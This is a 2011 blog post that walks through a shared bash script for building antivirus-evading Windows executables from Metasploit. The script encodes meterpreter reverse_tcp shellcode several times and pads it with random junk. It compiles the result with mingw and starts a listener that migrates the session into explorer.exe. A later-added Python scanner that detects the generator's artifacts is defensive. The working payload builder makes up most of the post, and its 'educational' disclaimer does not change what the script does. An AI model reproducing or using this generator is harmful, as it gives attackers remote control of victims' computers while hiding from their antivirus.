Thursday, November 17, 2011

Fully Undetected Payload Generator from MetaSploit with Linux

I have been researching a lot into payloads and shellcode, and I found one very good article about how to make the payload undetectable by antivirus.

By default, every generated payload is detected by antivirus software. They are very enthusiastic about detecting this stuff, although they are just doing their job. But we have a lot of options to make it undetectable.

The script I am posting was not made by me, and it is intended for intermediate users of Backtrack and Metasploit.

By posting this article I am assuming that you have Metasploit and Backtrack ready and working.

Please note that this is for purely educational purposes only; I never encourage people to infect others or steal information.
I am just sharing information which I got from the internet.

There is not much to be said about this issue, as there are so many ways to accomplish this. I wanted to give it a shot and see how far I would get in creating something that others call FUD (Fully Undetectable). As you can see from the results below, the file still gets detected by the Microsoft and Kaspersky AV, but I’ve intentionally left out the important part of the shell script that would make it fully undetectable. I was using some simple shellscript-fu and some really basic knowledge of the C language. The resulting executable will be different every time you run this script.

What we need is a decent Linux distro, mingw32 and of course Metasploit, so hopefully the shell script below will work. As always, please study it first to see what it does – don’t be a script kiddie. Please remember to save this into the Metasploit root folder and make it executable.
#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
# Lets check for MinGW32 (the cross compiler that builds the Win32 PE)
if builtin type -p i686-w64-mingw32-gcc > /dev/null ; then
    echo "Here is a network device list available on your machine"
else
    echo "Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools"
    echo "exiting....."; exit
fi
# List the interface names from /proc/net/dev (the first two lines are headers)
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=$(uname -s)
IP="" # store IP
case $OS in
   # old net-tools ifconfig output format ("inet addr:x.x.x.x")
   Linux) IP=`ifconfig $interface | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
#echo "$IP"
# Generate the raw payload and chain several encoders, $enumber passes each;
# the last msfencode writes its default (Ruby-style) output, which the sed below reformats
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw | ./msfencode -e x86/shikata_ga_nai -c $enumber > test.c
mkdir -p ShellCode
mv test.c ShellCode
cd ShellCode
# Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
# Turn the Ruby "buf = " variable into a C byte array
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include " >> temp
# First junk array: $seed random numbers, each line quoted so they concatenate into one string literal
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo  ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
# Entry point: cast the shellcode array to a function pointer and call it
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
# Second junk array, appended after main()
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
# Clean up the intermediate files
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

# Cross compile to a Win32 PE and give it a random name
i686-w64-mingw32-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E

What happens here is this:
  • We choose a network interface from the /proc/net/dev list ($interface)

  • Next we select a port number for our meterpreter listener ($port)

  • A random seed adds some junk to the resulting C source file ($seed)

  • Finally, we choose how many cycles we encode our shellcode with ($enumber)

  • Next we create the raw shellcode with msfpayload and msfencode using our variables

  • Do some sed work to format the raw shellcode into C

  • Add some bogus functions and random data arrays

  • Compile the C source with mingw32 to get a Win32 PE executable

  • Rename the EXE to some random filename, e.g. 32423.exe

  • Strip the debug info from the binary
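As an added, defender-side example that is not part of the original post: whatever the random filename and junk, every build of this generator leaves two artifacts in the binary, one long contiguous run of ASCII digits (the $RANDOM-filled ufs[] and tap[] string literals concatenate into a single digit string in .data) and a high-entropy window holding the multiply encoded micro[] bytes. The scanner below checks a file for both; the function names, thresholds and sample files are my own assumptions, not anything from the post.

```python
import math
import random
from collections import Counter

DIGITS = frozenset(b"0123456789")

def longest_digit_run(data: bytes) -> int:
    """Longest contiguous run of ASCII decimal digits (the concatenated $RANDOM junk)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b in DIGITS else 0
        best = max(best, cur)
    return best

def shannon_entropy(chunk: bytes) -> float:
    """Bits per byte of a chunk: 0.0 for empty or single-valued input, at most 8.0."""
    if not chunk:
        return 0.0
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())

def max_window_entropy(data: bytes, window: int = 512) -> float:
    """Highest entropy over fixed non-overlapping windows; encoded shellcode shows up here."""
    if len(data) <= window:
        return shannon_entropy(data)
    return max(shannon_entropy(data[i:i + window])
               for i in range(0, len(data) - window + 1, window))

def score(data: bytes, digit_run_min: int = 2000, entropy_min: float = 6.5) -> dict:
    """Flag a file carrying BOTH artifacts; the thresholds are assumed starting points."""
    run, ent = longest_digit_run(data), max_window_entropy(data)
    return {"digit_run": run, "max_entropy": round(ent, 2),
            "suspicious": run >= digit_run_min and ent >= entropy_min}

def build_samples() -> tuple:
    """Constructed stand-ins (not real binaries) mimicking the generator's .data layout."""
    rng = random.Random(1)
    junk = "".join(str(rng.randint(0, 32767)) for _ in range(1500)).encode()  # ufs[]/tap[]
    blob = bytes(rng.randrange(256) for _ in range(1024))                      # encoded micro[]
    generated = b"MZ\x90\x00" + b"\x00" * 64 + junk + b"\x00" + blob
    benign = b"Copyright 2011. Usage: tool.exe <input file> [options]\r\n" * 200
    return generated, benign

if __name__ == "__main__":
    for name, sample in zip(("generated", "benign"), build_samples()):
        print(name, score(sample))
```

Run on real files with `score(open(path, "rb").read())`; a digit run this long next to a near-random block is rare in legitimate PE files, but tune the thresholds against your own clean set before alerting on them.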

Here is the screenshot of the results from the Virus Total antivirus scanner engines

